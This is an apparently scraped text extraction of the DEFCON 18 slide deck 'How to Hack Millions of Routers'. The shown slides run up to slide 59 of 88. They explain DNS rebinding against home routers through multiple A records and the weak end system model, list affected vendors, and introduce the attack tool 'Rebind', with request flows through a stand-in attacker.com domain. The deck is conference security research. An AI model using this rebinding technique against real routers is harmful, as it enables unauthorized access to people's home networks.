DEFCON 18 Heffner Routers

  • View
    214

  • Download
    0

Embed Size (px)

Text of DEFCON 18 Heffner Routers

  • 8/9/2019 DEFCON 18 Heffner Routers

    1/88

    How to Hack Millions of Routers

    Craig Heffner, Seismic LLC

  • 8/9/2019 DEFCON 18 Heffner Routers

    2/88

    SOHO RouterSecurity?

  • 8/9/2019 DEFCON 18 Heffner Routers

    3/88

    Common Attack Techniques

    Cross Site Request Forgery No trust relationship between browser and router

    Cant forge Basic Authentication credentials

    Anti-CSRF

    Limited by the same origin policy

    DNS Rebinding

    Rebinding prevention by OpenDNS / NoScript / DNSWall

    Most rebinding attacks no longer work Most

  • 8/9/2019 DEFCON 18 Heffner Routers

    4/88

    Multiple A Record Attack

    Better known as DNS load balancing / redundancy

    Return multiple IP addresses in DNS response

    Browser attempts to connect to each IP addresses in order

    If one IP goes down, browser switches to the next IP in the list

    Limited attack

    Can rebind to any public IP address

    Cant rebind to an RFC1918 IP addresses

  • 8/9/2019 DEFCON 18 Heffner Routers

    5/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    Target IP: 2.3.5.8Attacker IP: 1.4.1.4Attacker Domain: attacker.com

  • 8/9/2019 DEFCON 18 Heffner Routers

    6/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    What is the IP address forattacker.com?

  • 8/9/2019 DEFCON 18 Heffner Routers

    7/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    1.4.1.42.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    8/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    GET / HTTP/1.1Host: attacker.com

  • 8/9/2019 DEFCON 18 Heffner Routers

    9/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    10/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    GET / HTTP/1.1Host: attacker.com

  • 8/9/2019 DEFCON 18 Heffner Routers

    11/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    TCP RST

  • 8/9/2019 DEFCON 18 Heffner Routers

    12/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

    GET / HTTP/1.1Host: attacker.com

  • 8/9/2019 DEFCON 18 Heffner Routers

    13/88

    Rebinding to a Public IP

    1.4.1.4

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    14/88

    Rebinding to a Private IP

    1.4.1.4

    Target IP: 192.168.1.1Attacker IP: 1.4.1.4Attacker Domain: attacker.com

    192.168.1.1

  • 8/9/2019 DEFCON 18 Heffner Routers

    15/88

    Rebinding to a Private IP

    1.4.1.4

    What is the IP address forattacker.com?

    192.168.1.1

  • 8/9/2019 DEFCON 18 Heffner Routers

    16/88

    Rebinding to a Private IP

    1.4.1.4

    1.4.1.4192.168.1.1

    192.168.1.1

  • 8/9/2019 DEFCON 18 Heffner Routers

    17/88

    Rebinding to a Private IP

    1.4.1.4

    GET / HTTP/1.1Host: attacker.com

    192.168.1.1

  • 8/9/2019 DEFCON 18 Heffner Routers

    18/88

    Rebinding to a Private IP

    1.4.1.4

    192.168.1.1

  • 8/9/2019 DEFCON 18 Heffner Routers

    19/88

    Services Bound to All Interfaces

    # netstatl

    Active Internet connections (only servers)

    Proto Recv-Q Send-Q Local Address Foreign Address State

    tcp 0 0 *:80 *:* LISTEN

    tcp 0 0 *:53 *:* LISTEN

    tcp 0 0 *:22 *:* LISTEN

    tcp 0 0 *:23 *:* LISTEN

  • 8/9/2019 DEFCON 18 Heffner Routers

    20/88

    Firewall Rules Based on Interface Names

    -A INPUTi ethoj DROP -A INPUTj ACCEPT

  • 8/9/2019 DEFCON 18 Heffner Routers

    21/88

    IP Stack Implementations

    RFC 1122 defines two IP models: Strong End System Model

    Weak End System Model

  • 8/9/2019 DEFCON 18 Heffner Routers

    22/88

    The Weak End System Model

    RFC 1122, Weak End System Model:

    A host MAY silently discard an incoming datagram whosedestination address does not correspond to the physicalinterface through which it is received.

    A host MAY restrict itself to sending (non-source-routed) IPdatagrams only through the physical interface that correspondsto the IP source address of the datagrams.

  • 8/9/2019 DEFCON 18 Heffner Routers

    23/88

    Weak End System Model

    eth1192.168.1.1

    eth02.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    24/88

    Weak End System Model

    TCP SYN PacketSource IP: 192.168.1.100Destination IP: 2.3.5.8Destination Port: 80

    eth1192.168.1.1

    eth02.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    25/88

    Weak End System Model

    TCP SYN/ACK PacketSource IP: 2.3.5.8Destination IP: 192.168.1.100Source Port: 80

    eth1192.168.1.1

    eth02.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    26/88

    Weak End System Model

    TCP ACK PacketSource IP: 192.168.1.100Destination IP: 2.3.5.8Destination Port: 80

    eth1192.168.1.1

    eth02.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    27/88

    Traffic Capture

  • 8/9/2019 DEFCON 18 Heffner Routers

    28/88

    End Result

  • 8/9/2019 DEFCON 18 Heffner Routers

    29/88

    Public IP Rebinding Attack

    1.4.1.4

    Target IP: 2.3.5.8Attacker IP: 1.4.1.4Attacker Domain: attacker.com

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    30/88

    Public IP Rebinding Attack

    1.4.1.4

    What is the IP address forattacker.com?

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    31/88

    Public IP Rebinding Attack

    1.4.1.4

    1.4.1.42.3.5.8

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    32/88

    Public IP Rebinding Attack

    1.4.1.4

    GET / HTTP/1.1Host: attacker.com

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    33/88

    Public IP Rebinding Attack

    1.4.1.4

    ...

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    34/88

    Public IP Rebinding Attack

    1.4.1.4

    GET / HTTP/1.1Host: attacker.com

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    35/88

    Public IP Rebinding Attack

    1.4.1.4

    TCP RST

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    36/88

    Public IP Rebinding Attack

    1.4.1.4

    GET / HTTP/1.1Host: attacker.com

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    37/88

    Public IP Rebinding Attack

    1.4.1.4

    2.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    38/88

    Public IP Rebinding Attack

    Pros:

    Nearly instant rebind, no delay or waiting period

    Dont need to know routers internal IP

    Works in all major browsers: IE, FF, Opera, Safari, Chrome

    Cons:

    Router must meet very specific conditions

    Must bind Web server to the WAN interface

    Firewall rules must be based on interface names, not IP addresses Must implement the weak end system model

    Not all routers are vulnerable

  • 8/9/2019 DEFCON 18 Heffner Routers

    39/88

    Affected Routers

  • 8/9/2019 DEFCON 18 Heffner Routers

    40/88

    Asus

  • 8/9/2019 DEFCON 18 Heffner Routers

    41/88

    Belkin

  • 8/9/2019 DEFCON 18 Heffner Routers

    42/88

    Dell

  • 8/9/2019 DEFCON 18 Heffner Routers

    43/88

    Thompson

  • 8/9/2019 DEFCON 18 Heffner Routers

    44/88

    Linksys

  • 8/9/2019 DEFCON 18 Heffner Routers

    45/88

    Third Party Firmware

  • 8/9/2019 DEFCON 18 Heffner Routers

    46/88

    ActionTec

  • 8/9/2019 DEFCON 18 Heffner Routers

    47/88

    Making the Attack Practical

    To make the attack practical:

    Must obtain targets public IP address automatically

    Must coordinate services (DNS, Web, Firewall)

    Must do something useful

  • 8/9/2019 DEFCON 18 Heffner Routers

    48/88

    Tool Release: Rebind

    Provides all necessary services

    DNS, Web, Firewall

    Serves up JavaScript code

    Limits foreground activity Makes use of cross-domain XHR, if supported

    Supports all major Web browsers

    Attacker can browse target routers in real-time Via a standard HTTP proxy

  • 8/9/2019 DEFCON 18 Heffner Routers

    49/88

    Rebind

    2.3.5.8 1.4.1.4

    Target IP: 2.3.5.8Rebind IP: 1.4.1.4Attacker Domain: attacker.com

  • 8/9/2019 DEFCON 18 Heffner Routers

    50/88

    Rebind

  • 8/9/2019 DEFCON 18 Heffner Routers

    51/88

    Rebind

  • 8/9/2019 DEFCON 18 Heffner Routers

    52/88

    Rebind

    2.3.5.8 1.4.1.4

    What is the IP address forattacker.com?

  • 8/9/2019 DEFCON 18 Heffner Routers

    53/88

    Rebind

    2.3.5.8 1.4.1.4

    1.4.1.4

  • 8/9/2019 DEFCON 18 Heffner Routers

    54/88

    Rebind

    2.3.5.8 1.4.1.4

    GET /init HTTP/1.1Host: attacker.com

  • 8/9/2019 DEFCON 18 Heffner Routers

    55/88

    Rebind

    2.3.5.8 1.4.1.4

    Location: http://wacme.attacker.com/exec

  • 8/9/2019 DEFCON 18 Heffner Routers

    56/88

    Rebind

    2.3.5.8 1.4.1.4

    What is the IP address forwacme.attacker.com?

  • 8/9/2019 DEFCON 18 Heffner Routers

    57/88

    Rebind

    2.3.5.8 1.4.1.4

    1.4.1.42.3.5.8

  • 8/9/2019 DEFCON 18 Heffner Routers

    58/88

    Rebind

    2.3.5.8 1.4.1.4

    GET /exec HTTP/1.1Host: wacme.attacker.com

  • 8/9/2019 DEFCON 18 Heffner Routers

    59/88

    Rebind

    2.3.5.8 1.4.1.4